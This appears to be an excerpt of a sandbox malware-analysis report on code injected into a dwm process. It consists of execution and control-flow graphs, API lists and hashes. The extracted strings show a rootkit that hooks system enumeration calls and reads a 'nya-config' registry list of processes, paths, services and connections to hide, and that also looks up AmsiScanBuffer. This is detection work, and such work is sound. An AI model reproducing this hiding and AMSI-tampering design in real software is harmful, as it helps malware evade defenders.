                                                  execution_graph 22410 262f1ca1e3c LoadLibraryA GetProcAddress 22411 262f1ca1e6f 22410->22411 22412 262f1ca1e62 SleepEx 22410->22412 22412->22412 22413 262f1ca5c8d 22415 262f1ca5c94 22413->22415 22414 262f1ca5cfb 22415->22414 22416 262f1ca5d77 VirtualProtect 22415->22416 22417 262f1ca5db1 22416->22417 22418 262f1ca5da3 GetLastError 22416->22418 22418->22417 22419 262f1ca6430 22420 262f1ca643d 22419->22420 22421 262f1ca6449 22420->22421 22429 262f1ca655a 22420->22429 22422 262f1ca647e 22421->22422 22423 262f1ca64cd 22421->22423 22424 262f1ca64a6 SetThreadContext 22422->22424 22424->22423 22425 262f1ca6581 VirtualProtect FlushInstructionCache 22425->22429 22426 262f1ca663e 22427 262f1ca665e 22426->22427 22437 262f1ca4b20 VirtualFree 22426->22437 22438 262f1ca5530 GetCurrentProcess 22427->22438 22429->22425 22429->22426 22431 262f1ca6663 22432 262f1ca66b7 22431->22432 22433 262f1ca6677 ResumeThread 22431->22433 22442 262f1ca8070 8 API calls 2 library calls 22432->22442 22434 262f1ca66ab 22433->22434 22434->22431 22436 262f1ca66ff 22437->22427 22441 262f1ca554c 22438->22441 22439 262f1ca5562 VirtualProtect FlushInstructionCache 22439->22441 22440 262f1ca5593 22440->22431 22441->22439 22441->22440 22442->22436 22443 262f1ca2c80 TlsGetValue TlsGetValue TlsGetValue 22444 262f1ca2d51 NtEnumerateValueKey 22443->22444 22445 262f1ca2cd9 22443->22445 22446 262f1ca2d86 22444->22446 22448 262f1ca2d4c 22444->22448 22445->22444 22451 262f1ca2ce1 22445->22451 22446->22448 22449 262f1ca2da0 NtEnumerateValueKey 22446->22449 22450 262f1ca2e06 TlsSetValue TlsSetValue TlsSetValue 22446->22450 22453 262f1ca3f88 StrCmpNIW 22446->22453 22447 262f1ca2d2d NtEnumerateValueKey 22447->22448 22447->22451 22449->22446 22450->22448 22451->22447 22451->22448 22451->22450 22454 262f1ca3f88 22451->22454 22453->22446 22455 262f1ca3faa 22454->22455 22456 262f1ca3f95 StrCmpNIW 22454->22456 22455->22451 22456->22455 22457 262f1caf370 VirtualProtect 22458 262f1ca1bc4 22465 262f1ca1724 GetProcessHeap HeapAlloc 22458->22465 22460 262f1ca1bda SleepEx 22461 262f1ca1724 50 API calls 22460->22461 22463 262f1ca1bd3 22461->22463 22463->22460 22464 262f1ca159c StrCmpIW StrCmpW 22463->22464 22516 262f1ca19b0 12 API calls 22463->22516 22464->22463 22517 262f1ca1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22465->22517 22467 262f1ca174c 22518 262f1ca1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22467->22518 22469 262f1ca1754 22519 262f1ca1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22469->22519 22471 262f1ca175d 22520 262f1ca1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22471->22520 22473 262f1ca1766 22521 262f1ca1264 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22473->22521 22475 262f1ca176f 22522 262f1ca1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22475->22522 22477 262f1ca1778 22523 262f1ca1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22477->22523 22479 262f1ca1781 22524 262f1ca1000 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 22479->22524 22481 262f1ca178a RegOpenKeyExW 22482 262f1ca17bc RegOpenKeyExW 22481->22482 22483 262f1ca19a2 22481->22483 22484 262f1ca17fb RegOpenKeyExW 22482->22484 22485 262f1ca17e5 22482->22485 22483->22463 22487 262f1ca181f 22484->22487 22488 262f1ca1836 RegOpenKeyExW 22484->22488 22531 262f1ca12b8 16 API calls 22485->22531 22525 262f1ca104c RegQueryInfoKeyW 22487->22525 22491 262f1ca185a 22488->22491 22492 262f1ca1871 RegOpenKeyExW 22488->22492 22489 262f1ca17f1 RegCloseKey 22489->22484 22532 262f1ca12b8 16 API calls 22491->22532 22495 262f1ca18ac RegOpenKeyExW 22492->22495 22496 262f1ca1895 22492->22496 22498 262f1ca18d0 22495->22498 22499 262f1ca18e7 RegOpenKeyExW 22495->22499 22533 262f1ca12b8 16 API calls 22496->22533 22534 262f1ca12b8 16 API calls 22498->22534 22503 262f1ca190b 22499->22503 22504 262f1ca1922 RegOpenKeyExW 22499->22504 22500 262f1ca1867 RegCloseKey 22500->22492 22501 262f1ca18a2 RegCloseKey 22501->22495 22506 262f1ca104c 6 API calls 22503->22506 22507 262f1ca195d RegOpenKeyExW 22504->22507 22508 262f1ca1946 22504->22508 22505 262f1ca18dd RegCloseKey 22505->22499 22509 262f1ca1918 RegCloseKey 22506->22509 22511 262f1ca1981 22507->22511 22512 262f1ca1998 RegCloseKey 22507->22512 22510 262f1ca104c 6 API calls 22508->22510 22509->22504 22514 262f1ca1953 RegCloseKey 22510->22514 22513 262f1ca104c 6 API calls 22511->22513 22512->22483 22515 262f1ca198e RegCloseKey 22513->22515 22514->22507 22515->22512 22517->22467 22518->22469 22519->22471 22520->22473 22521->22475 22522->22477 22523->22479 22524->22481 22526 262f1ca10bf 22525->22526 22527 262f1ca11b5 RegCloseKey 22525->22527 22526->22527 22528 262f1ca10cf RegEnumValueW 22526->22528 22527->22488 22529 262f1ca1125 22528->22529 22529->22527 22529->22528 22530 262f1ca114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 22529->22530 22530->22529 22531->22489 22532->22500 22533->22501 22534->22505 22536 262f1ca41f9 22539 262f1ca4146 _invalid_parameter_noinfo 22536->22539 22537 262f1ca41b0 22538 262f1ca4196 VirtualQuery 22538->22537 22538->22539 22539->22537 22539->22538 22540 262f1ca41ca VirtualAlloc 22539->22540 22540->22537 22541 262f1ca41fb GetLastError 22540->22541 22541->22539

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Value$Enumerate
                                                  • String ID:
                                                  • API String ID: 3520290360-0
                                                  • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction ID: c1cbe84f50f0c7ef176c396f0ab59772db48b628da06dd7362134303996ff1bc
                                                  • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                                  • Instruction Fuzzy Hash: 6151B131604A70C7E366CB16A45C65AB3B4F788B84F90403DEE4A43FD5DB3AC849DB42

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                  • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                  • API String ID: 2135414181-3572789727
                                                  • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction ID: 570cfa32801e682319d85f7c353ef15fa71c6047c202d0b4bc116362672f62d2
                                                  • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction Fuzzy Hash: 2E71D736310E65C5EB11DF66E8AC69D23B8FB84F88F841121DA4D97FA9DE3AC448C741

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                  • API String ID: 1735320900-4225371247
                                                  • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction ID: 82652c38a6cce80ac4cdfdd83d052b883e98c682ace51435845db53c249d7eb1
                                                  • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction Fuzzy Hash: 24519C74510EBAE5EB02EBA5EC6C7D42330A750B54FC00537A50982DF1DE3A865ED387

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                  • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                  • API String ID: 740688525-1880043860
                                                  • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction ID: f307d45a4664954ca76000c023e3a31593f4e0755c58e8d88206b99741ba89b3
                                                  • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction Fuzzy Hash: F251B131701F64D1EA1A9B56A82C3A923B0BB49BB0FD807359E3D47BD0DF3AD44D8642

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 151 262f1ca6270-262f1ca6297 152 262f1ca62ab-262f1ca62b6 GetCurrentThreadId 151->152 153 262f1ca6299-262f1ca62a8 151->153 154 262f1ca62c2-262f1ca62c9 152->154 155 262f1ca62b8-262f1ca62bd 152->155 153->152 157 262f1ca62db-262f1ca62ef 154->157 158 262f1ca62cb-262f1ca62d6 call 262f1ca60a0 154->158 156 262f1ca66ef-262f1ca6706 call 262f1ca8070 155->156 161 262f1ca62fe-262f1ca6304 157->161 158->156 164 262f1ca630a-262f1ca6313 161->164 165 262f1ca63d5-262f1ca63f6 161->165 167 262f1ca635a-262f1ca63cd call 262f1ca4c50 call 262f1ca4bf0 call 262f1ca4bb0 164->167 168 262f1ca6315-262f1ca6358 call 262f1cb3a40 164->168 169 262f1ca63fc-262f1ca641c GetThreadContext 165->169 170 262f1ca655f-262f1ca6570 call 262f1ca7bff 165->170 178 262f1ca63d0 167->178 168->178 173 262f1ca655a 169->173 174 262f1ca6422-262f1ca6443 169->174 185 262f1ca6575-262f1ca657b 170->185 173->170 174->173 182 262f1ca6449-262f1ca6452 174->182 178->161 186 262f1ca6454-262f1ca6465 182->186 187 262f1ca64d2-262f1ca64e3 182->187 189 262f1ca6581-262f1ca65d8 VirtualProtect FlushInstructionCache 185->189 190 262f1ca663e-262f1ca664e 185->190 195 262f1ca64cd 186->195 196 262f1ca6467-262f1ca647c 186->196 193 262f1ca6555 187->193 194 262f1ca64e5-262f1ca6503 187->194 191 262f1ca65da-262f1ca65e4 189->191 192 262f1ca6609-262f1ca6639 call 262f1ca7fdc 189->192 198 262f1ca6650-262f1ca6657 190->198 199 262f1ca665e-262f1ca666a call 262f1ca5530 190->199 191->192 200 262f1ca65e6-262f1ca6601 call 262f1ca4ad0 191->200 192->185 194->193 202 262f1ca6505-262f1ca654c call 262f1ca4040 194->202 195->193 196->195 203 262f1ca647e-262f1ca64c8 call 262f1ca40b0 SetThreadContext 196->203 198->199 204 262f1ca6659 call 262f1ca4b20 198->204 215 262f1ca666f-262f1ca6675 199->215 200->192 202->193 216 262f1ca6550 call 262f1ca7c1d 202->216 203->195 204->199 217 262f1ca66b7-262f1ca66d5 215->217 218 262f1ca6677-262f1ca66b5 ResumeThread call 262f1ca7fdc 215->218 216->193 220 262f1ca66e9 217->220 221 262f1ca66d7-262f1ca66e6 217->221 218->215 220->156 221->220
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Thread$Current$Context
                                                  • String ID:
                                                  • API String ID: 1666949209-0
                                                  • Opcode ID: 06345c450f8296db91144f59c54cbd40b4799d269efc1b0e1a6bce112c420a70
                                                  • Instruction ID: 72317c16645d2a145ddf8ca7d2e858d4e9a0203a4bfdfee25e87c19917159557
                                                  • Opcode Fuzzy Hash: 06345c450f8296db91144f59c54cbd40b4799d269efc1b0e1a6bce112c420a70
                                                  • Instruction Fuzzy Hash: CAD19B76205FA8C1DA71DB0AE4A835A77B0F388B88F510126EACD47BE5DF3AC555CB01

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 223 262f1ca1e3c-262f1ca1e60 LoadLibraryA GetProcAddress 224 262f1ca1e6f-262f1ca1e73 223->224 225 262f1ca1e62-262f1ca1e6d SleepEx 223->225 225->225
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProcSleep
                                                  • String ID: AmsiScanBuffer$amsi.dll
                                                  • API String ID: 188063004-3248079830
                                                  • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction ID: 8e138c75d4aa9a4c5c1ef0e8ef521533a63d454bb31425036f3c8e1b6179071c
                                                  • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                  • Instruction Fuzzy Hash: 85D09E34615E20D5FA49EB11EC6C3543275BF64F01FC40435C61E86AE1DE3E895DD742

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 226 262f1ca5810-262f1ca583c 227 262f1ca584d-262f1ca5856 226->227 228 262f1ca583e-262f1ca5846 226->228 229 262f1ca5858-262f1ca5860 227->229 230 262f1ca5867-262f1ca5870 227->230 228->227 229->230 231 262f1ca5881-262f1ca588a 230->231 232 262f1ca5872-262f1ca587a 230->232 233 262f1ca588c-262f1ca5891 231->233 234 262f1ca5896-262f1ca58a1 GetCurrentThreadId 231->234 232->231 235 262f1ca5e13-262f1ca5e1a 233->235 236 262f1ca58ad-262f1ca58b4 234->236 237 262f1ca58a3-262f1ca58a8 234->237 238 262f1ca58c1-262f1ca58ca 236->238 239 262f1ca58b6-262f1ca58bc 236->239 237->235 240 262f1ca58cc-262f1ca58d1 238->240 241 262f1ca58d6-262f1ca58e2 238->241 239->235 240->235 242 262f1ca590e-262f1ca5965 call 262f1ca5e20 * 2 241->242 243 262f1ca58e4-262f1ca5909 241->243 248 262f1ca597a-262f1ca5983 242->248 249 262f1ca5967-262f1ca596e 242->249 243->235 250 262f1ca5995-262f1ca599e 248->250 251 262f1ca5985-262f1ca5992 248->251 252 262f1ca5970 249->252 253 262f1ca5976 249->253 256 262f1ca59a0-262f1ca59b0 250->256 257 262f1ca59b3-262f1ca59d8 call 262f1ca7fa0 250->257 251->250 254 262f1ca59f0-262f1ca59f6 252->254 255 262f1ca59e6-262f1ca59ea 253->255 259 262f1ca5a25-262f1ca5a2b 254->259 260 262f1ca59f8-262f1ca5a14 call 262f1ca4ad0 254->260 255->254 256->257 266 262f1ca5a6d-262f1ca5a82 call 262f1ca4400 257->266 267 262f1ca59de 257->267 261 262f1ca5a2d-262f1ca5a4c call 262f1ca7fdc 259->261 262 262f1ca5a55-262f1ca5a68 259->262 260->259 271 262f1ca5a16-262f1ca5a1e 260->271 261->262 262->235 273 262f1ca5a91-262f1ca5a9a 266->273 274 262f1ca5a84-262f1ca5a8c 266->274 267->255 271->259 275 262f1ca5aac-262f1ca5afa call 262f1cb40e0 273->275 276 262f1ca5a9c-262f1ca5aa9 273->276 274->255 279 262f1ca5b02-262f1ca5b0a 275->279 276->275 280 262f1ca5b10-262f1ca5bfb call 262f1ca7b80 279->280 281 262f1ca5c17-262f1ca5c1f 279->281 291 262f1ca5bfd 280->291 292 262f1ca5bff-262f1ca5c0e call 262f1ca47a0 280->292 282 262f1ca5c21-262f1ca5c34 call 262f1ca4cd0 281->282 283 262f1ca5c63-262f1ca5c6b 281->283 298 262f1ca5c38-262f1ca5c61 282->298 299 262f1ca5c36 282->299 287 262f1ca5c6d-262f1ca5c75 283->287 288 262f1ca5c77-262f1ca5c86 283->288 287->288 294 262f1ca5c94-262f1ca5ca1 287->294 289 262f1ca5c8f 288->289 290 262f1ca5c88 288->290 289->294 290->289 291->281 302 262f1ca5c10 292->302 303 262f1ca5c12 292->303 296 262f1ca5ca4-262f1ca5cf9 call 262f1cb3a40 294->296 297 262f1ca5ca3 294->297 305 262f1ca5cfb-262f1ca5d03 296->305 306 262f1ca5d08-262f1ca5da1 call 262f1ca4c50 call 262f1ca4bb0 VirtualProtect 296->306 297->296 298->281 299->283 302->281 303->279 311 262f1ca5db1-262f1ca5e11 306->311 312 262f1ca5da3-262f1ca5da8 GetLastError 306->312 311->235 312->311
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: e54ed8d5981410d2d10d562d395602567931b9c6313d0845cabb15234d5347af
                                                  • Instruction ID: 397a363a443f3402c4888eab2f06aea4069841a835f7bbaa22b888eec30f6866
                                                  • Opcode Fuzzy Hash: e54ed8d5981410d2d10d562d395602567931b9c6313d0845cabb15234d5347af
                                                  • Instruction Fuzzy Hash: C602D432218B94C6E761CB55F4A835AB7B0F385794F504025EA8E87FE8DB7AC498CF01

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                  • String ID:
                                                  • API String ID: 1092925422-0
                                                  • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction ID: 2ce9b71b938df398e874f6265952a8152d80c89baf23e1fb9120a7030c9e5a9b
                                                  • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                  • Instruction Fuzzy Hash: DE113A36618B50C3EB658B61E41C20AA7B4FB44B80F440036EE8D43BD4EB6EC9488781
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000003.1494451949.00000262F1EB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000262F1EB0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_3_262f1eb0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Virtual$Protect$AllocLibraryLoad
                                                  • String ID:
                                                  • API String ID: 3316853933-0
                                                  • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                  • Instruction ID: 0b7023ae825e45743f6de2ae387a76cfbe5d62cb06ddffe46759c17fab0ee46a
                                                  • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                  • Instruction Fuzzy Hash: 9A91F776B019A0C7DB64CF29D40D76D73F5FB64B94F9481249E4907F88DA36E85AC700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000003.1646374576.00000262F1CD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000262F1CD0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_3_262f1cd0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Virtual$Protect$Alloc
                                                  • String ID:
                                                  • API String ID: 2541858876-0
                                                  • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                  • Instruction ID: 59ea7243bf80c569789660e50a8d2276252486441d4de17b73a98efa3b3f7c3a
                                                  • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                  • Instruction Fuzzy Hash: 4A9115B2B01961C7DB548F29D40C76DB3B1F744B94F989134DE6A07BC8DA3AE816C701

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Virtual$AllocQuery
                                                  • String ID:
                                                  • API String ID: 31662377-0
                                                  • Opcode ID: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
                                                  • Instruction ID: 113d874613f57faf1c3d3c0931de7e41e3b34176619d4f2ec985b1f6127f3510
                                                  • Opcode Fuzzy Hash: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
                                                  • Instruction Fuzzy Hash: 4E317332219E50C1EA32CA55E06C34A62B0F398788F940635E6CD06FE8DF3EC5458B01

                                                  Control-flow Graph

                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32 ref: 00000262F1CA3A35
                                                  • PathFindFileNameW.SHLWAPI ref: 00000262F1CA3A44
                                                    • Part of subcall function 00000262F1CA3F88: StrCmpNIW.SHLWAPI(?,?,?,00000262F1CA272F), ref: 00000262F1CA3FA0
                                                    • Part of subcall function 00000262F1CA3EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000262F1CA3A5B), ref: 00000262F1CA3EDB
                                                    • Part of subcall function 00000262F1CA3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000262F1CA3A5B), ref: 00000262F1CA3F0E
                                                    • Part of subcall function 00000262F1CA3EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,00000262F1CA3A5B), ref: 00000262F1CA3F2E
                                                    • Part of subcall function 00000262F1CA3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000262F1CA3A5B), ref: 00000262F1CA3F47
                                                    • Part of subcall function 00000262F1CA3EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,00000262F1CA3A5B), ref: 00000262F1CA3F68
                                                  • CreateThread.KERNELBASE ref: 00000262F1CA3A8B
                                                    • Part of subcall function 00000262F1CA1E74: GetCurrentThread.KERNEL32 ref: 00000262F1CA1E7F
                                                    • Part of subcall function 00000262F1CA1E74: CreateThread.KERNELBASE ref: 00000262F1CA2043
                                                    • Part of subcall function 00000262F1CA1E74: TlsAlloc.KERNEL32 ref: 00000262F1CA2049
                                                    • Part of subcall function 00000262F1CA1E74: TlsAlloc.KERNEL32 ref: 00000262F1CA2055
                                                    • Part of subcall function 00000262F1CA1E74: TlsAlloc.KERNEL32 ref: 00000262F1CA2061
                                                    • Part of subcall function 00000262F1CA1E74: TlsAlloc.KERNEL32 ref: 00000262F1CA206D
